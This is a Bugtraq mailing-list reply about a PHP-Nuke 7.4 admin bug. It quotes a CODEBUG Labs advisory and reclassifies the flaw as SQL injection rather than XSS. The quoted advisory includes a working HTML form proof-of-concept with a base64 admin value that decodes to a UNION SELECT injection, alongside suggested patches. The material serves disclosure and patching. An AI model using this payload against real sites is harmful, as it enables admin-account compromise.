Re: [XSS] PHP-Nuke 7.4 Bugs
This seems like more of a SQL injection bug.
$admin value "eCcgVU5JT04gU0VMRUNUIDEvKjox" decodes to "x' UNION SELECT 1/*:1"
which will cause the pwd check to be manipulated into union selecting the
valid password.
7.4 Patch can be in auth.php, replace line (about) 61
if ($aid=="" || $pwd=="") {
with
if ($aid=="" || $pwd=="" || stristr($aid,'select')) {
I don't know if 7.5 is also vulnerable.
Blaine Elzey
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From: Pierquinto Manco <mantra@xxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Sent: 4 Sep 2004 08:19:26 -0000
Subject: [XSS] PHP-Nuke 7.4 ViewAdmin Bug
> **************************************************************
> * CODEBUG Labs
> * Advisory #3
> * Title: ViewAdmin Bug
> * Author: Pierquinto 'Mantra' Manco
> * Product: PHP-Nuke 7.4
> * Type: XSS
> * Web: http://www.mantralab.org
> *
> **************************************************************
>
> View Admin Bug
>
> - ) Description
> PHP-Nuke is a very bugged web CMS, version 7.4 has critical
> XSS bug that permit to an attacker to view Admin account aid
> and to use this information to delete account using Delete Admin Bug
> (CODEBUG #2).
> This bug is very old too but we can bypass the patch sending data
> by POST instead of GET.
>
> - ) Proof-of-Concept
> Create a HTML file with this lines:
>
> <form name="form1" method="POST"
action="http://www.sitewithphpnuke.com/admin.php">
> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
> <br>
> <input type="hidden" name="add_radminsuper" value="1">
> <br>
> <input type="hidden" name="op" value="mod_authors">
> <input type="submit" name="Submit" value="Display">
> <br>
> </p>
> </form>
>
> - ) Patch
>
> Apply this code to your admin.php file:
>
> if ( !empty($HTTP_GET_VARS['op']) ) {
> $op = $HTTP_GET_VARS['op'];
> }
>
> if ( !empty($HTTP_POST_VARS['op']) ) {
> $op = $HTTP_POST_VARS['op'];
> }
>
> -) Note
>
> There are a lot of this problem in PHP-Nuke 7.4, my patch will check
> the content of $_POST[op] and $_GET[op].
> I'm going to post all this vulnerabilities on my site...
> http://www.mantralab.org
>
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> http://www.mantralab.org
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